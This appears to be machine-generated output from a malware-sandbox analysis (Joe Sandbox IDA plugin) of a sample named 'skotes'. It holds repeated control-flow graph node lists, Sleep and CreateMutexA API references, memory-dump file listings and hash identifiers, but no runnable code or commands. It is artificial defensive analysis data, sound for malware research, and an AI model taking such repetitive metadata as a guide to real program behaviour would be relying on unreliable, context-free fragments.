                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 238 b79adc-b79ae8 239 b79afe-b79b27 call b8d663 238->239 240 b79aea-b79af8 238->240 248 b79b55-b79b57 239->248 249 b79b29-b79b35 239->249 240->239 241 b7a917 240->241 243 b7a953-b7a994 Sleep CreateMutexA 241->243 244 b7a917 call ba6c6a 241->244 250 b7a9a7-b7a9a8 243->250 251 b7a996-b7a998 243->251 244->243 254 b79b65-b79d91 call b87a00 call b75c10 call b78b30 call b88220 call b87a00 call b75c10 call b78b30 call b88220 248->254 255 b79b59-b7a916 call b880c0 248->255 252 b79b37-b79b45 249->252 253 b79b4b-b79b52 call b8d663 249->253 251->250 256 b7a99a-b7a9a5 251->256 252->241 252->253 253->248 256->250
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: a4f1c11e51a4bb011b88931df79dbe1f142530ab731d5f2555da47d3e644c531
                                                                                                                                                                                                                                          • Instruction ID: 02d3854dd880697b8cebda1ab2fbd651271f493165d08b9aa2e17b5909a111de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4f1c11e51a4bb011b88931df79dbe1f142530ab731d5f2555da47d3e644c531
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41216E327042009BEB189B68ECC572CF7E2EBC1310F208299E42CC73E1DBB59991C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 315 b7a856-b7a86e 316 b7a870-b7a87c 315->316 317 b7a89c-b7a89e 315->317 318 b7a892-b7a899 call b8d663 316->318 319 b7a87e-b7a88c 316->319 320 b7a8a0-b7a8a7 317->320 321 b7a8a9-b7a8b1 call b77d30 317->321 318->317 319->318 322 b7a94e-b7a987 call ba6c6a Sleep CreateMutexA 319->322 324 b7a8eb-b7a916 call b880c0 320->324 330 b7a8e4-b7a8e6 321->330 331 b7a8b3-b7a8bb call b77d30 321->331 336 b7a98e-b7a994 322->336 330->324 331->330 337 b7a8bd-b7a8c5 call b77d30 331->337 338 b7a9a7-b7a9a8 336->338 339 b7a996-b7a998 336->339 337->330 343 b7a8c7-b7a8cf call b77d30 337->343 339->338 341 b7a99a-b7a9a5 339->341 341->338 343->330 347 b7a8d1-b7a8d9 call b77d30 343->347 347->330 350 b7a8db-b7a8e2 347->350 350->324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 7c1d5e934f461a51ddf00c01458da38df28fcfdf67993fd23ab0404d49e52ced
                                                                                                                                                                                                                                          • Instruction ID: 8aa34f856da9cec8f299158d7a354e1353f2a895a4381745cb1dad0997e859aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c1d5e934f461a51ddf00c01458da38df28fcfdf67993fd23ab0404d49e52ced
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7217B7124D201CBE72467789C96B3DB3D2DFC1300F24C4E6E16C962D1CB7588819293

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 292 b7a34f-b7a35b 293 b7a371-b7a39a call b8d663 292->293 294 b7a35d-b7a36b 292->294 300 b7a39c-b7a3a8 293->300 301 b7a3c8-b7a916 call b880c0 293->301 294->293 295 b7a93a 294->295 297 b7a953-b7a994 Sleep CreateMutexA 295->297 298 b7a93a call ba6c6a 295->298 307 b7a9a7-b7a9a8 297->307 308 b7a996-b7a998 297->308 298->297 304 b7a3be-b7a3c5 call b8d663 300->304 305 b7a3aa-b7a3b8 300->305 304->301 305->295 305->304 308->307 311 b7a99a-b7a9a5 308->311 311->307
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: aaa32be6466baf8614fd8a295d8a8ad99ab7ebb604a7960f143a2130d2d813ad
                                                                                                                                                                                                                                          • Instruction ID: 1c27aa454e7da31be113d2e8ef0efe74b0b47e60db15d8e4822b2d5bd19fa5b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa32be6466baf8614fd8a295d8a8ad99ab7ebb604a7960f143a2130d2d813ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74214C326042009BEB18AF68EC8576CF7E2DBD1310F248299E428977D1D775A980C792
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
